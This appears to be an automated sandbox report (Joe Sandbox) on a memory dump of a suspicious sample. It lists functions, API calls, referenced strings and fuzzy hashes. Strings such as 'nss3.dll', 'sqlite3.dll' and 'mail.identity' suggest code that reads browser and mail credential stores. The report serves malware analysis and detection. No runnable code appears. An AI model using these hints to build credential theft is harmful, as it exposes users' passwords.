                                                                                                                                                              • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3503910906-0
                                                                                                                                                              • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                                              • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                                                                                              • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                                              • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000), ref: 00409E0E
                                                                                                                                                                • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00409ED5
                                                                                                                                                              • strlen.MSVCRT ref: 0040B60B
                                                                                                                                                              • atoi.MSVCRT(?,00000000,?,74DF0A60,?,00000000), ref: 0040B619
                                                                                                                                                              • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                                                                              • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4107816708-0
                                                                                                                                                              • Opcode ID: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                                                                                              • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                                                                                              • Opcode Fuzzy Hash: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                                                                                              • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                                                                                              APIs
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                                                                                              • _gmtime64.MSVCRT ref: 00411437
                                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                                                                                              • strftime.MSVCRT ref: 00411476
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1886415126-0
                                                                                                                                                              • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                                                                              • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                                                                                                              • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                                                                              • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: strlen
                                                                                                                                                              • String ID: >$>$>
                                                                                                                                                              • API String ID: 39653677-3911187716
                                                                                                                                                              • Opcode ID: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                                                                              • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                                                                                              • Opcode Fuzzy Hash: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                                                                              • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                                                                                              APIs
                                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy
                                                                                                                                                              • String ID: @
                                                                                                                                                              • API String ID: 3510742995-2766056989
                                                                                                                                                              • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                              • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                                                                                              • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                              • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _strcmpi
                                                                                                                                                              • String ID: C@$mail.identity
                                                                                                                                                              • API String ID: 1439213657-721921413
                                                                                                                                                              • Opcode ID: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                                                                              • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                                                                                              • Opcode Fuzzy Hash: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                                                                              • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 00406640
                                                                                                                                                                • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                                                                                • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                              • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy$memset$memcmp
                                                                                                                                                              • String ID: Ul@
                                                                                                                                                              • API String ID: 270934217-715280498
                                                                                                                                                              • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                              • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                                                                                              • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                              • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                                                                                              Strings
                                                                                                                                                              • recovered %d pages from %s, xrefs: 004188B4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                                                                                              • String ID: recovered %d pages from %s
                                                                                                                                                              • API String ID: 985450955-1623757624
                                                                                                                                                              • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                                                                              • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                                                                                              • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                                                                              • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _ultoasprintf
                                                                                                                                                              • String ID: %s %s %s
                                                                                                                                                              • API String ID: 432394123-3850900253
                                                                                                                                                              • Opcode ID: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                                                                                              • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                                                                                              • Opcode Fuzzy Hash: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                                                                                              • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                                                                                              APIs
                                                                                                                                                              • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                              • sprintf.MSVCRT ref: 0040909B
                                                                                                                                                                • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                                                                                • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                                                                                • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                                                                                • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                                                                                • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                                                                                • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                                                                                • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                                                              • String ID: menu_%d
                                                                                                                                                              • API String ID: 1129539653-2417748251
                                                                                                                                                              • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                                                              • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                                                                                              • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                                                              • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _msizerealloc
                                                                                                                                                              • String ID: failed memory resize %u to %u bytes
                                                                                                                                                              • API String ID: 2713192863-2134078882
                                                                                                                                                              • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                                                              • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                                                                                              • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                                                              • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104,?), ref: 00406FA1
                                                                                                                                                              • strrchr.MSVCRT ref: 00409808
                                                                                                                                                              • _mbscat.MSVCRT ref: 0040981D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileModuleName_mbscatstrrchr
                                                                                                                                                              • String ID: _lng.ini
                                                                                                                                                              • API String ID: 3334749609-1948609170
                                                                                                                                                              • Opcode ID: ef02889c57b29374549b5c1aa1c0392ef6eb8eedf2cf02011a8dcbac94fb250b
                                                                                                                                                              • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                                                                                                                              • Opcode Fuzzy Hash: ef02889c57b29374549b5c1aa1c0392ef6eb8eedf2cf02011a8dcbac94fb250b
                                                                                                                                                              • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                                                                                                                              APIs
                                                                                                                                                              • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                              • _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _mbscat$_mbscpystrlen
                                                                                                                                                              • String ID: sqlite3.dll
                                                                                                                                                              • API String ID: 1983510840-1155512374
                                                                                                                                                              • Opcode ID: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                                                                                              • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                                                                                              • Opcode Fuzzy Hash: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                                                                                              • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                                                                                              APIs
                                                                                                                                                              • GetWindowLongA.USER32(?,000000EC), ref: 004073D0
                                                                                                                                                              • SetWindowLongA.USER32(00000001,000000EC,00000000), ref: 004073E2
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LongWindow
                                                                                                                                                              • String ID: MZ@
                                                                                                                                                              • API String ID: 1378638983-2978689999
                                                                                                                                                              • Opcode ID: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                                                                                                                              • Instruction ID: af96c772fb3515a1af29397562e0ba089e4702b068c0c421cdc779d54beb7f6e
                                                                                                                                                              • Opcode Fuzzy Hash: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                                                                                                                              • Instruction Fuzzy Hash: 81C0123015D0166BCF101B24DC04E167E54B782321F208770B062E00F0C7704400A504
                                                                                                                                                              APIs
                                                                                                                                                              • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: PrivateProfileString
                                                                                                                                                              • String ID: A4@$Server Details
                                                                                                                                                              • API String ID: 1096422788-4071850762
                                                                                                                                                              • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                                                              • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                                                                                              • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                                                              • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                                                                                              APIs
                                                                                                                                                              • strlen.MSVCRT ref: 0040849A
                                                                                                                                                              • memset.MSVCRT ref: 004084D2
                                                                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,75A8EB20,?,00000000), ref: 0040858F
                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,?,?,?,75A8EB20,?,00000000), ref: 004085BA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3110682361-0
                                                                                                                                                              • Opcode ID: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                                                                                                                              • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                                                                                              • Opcode Fuzzy Hash: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                                                                                                                              • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                                                                                              APIs
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3510742995-0
                                                                                                                                                              • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                                              • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                                                                                              • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                                              • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8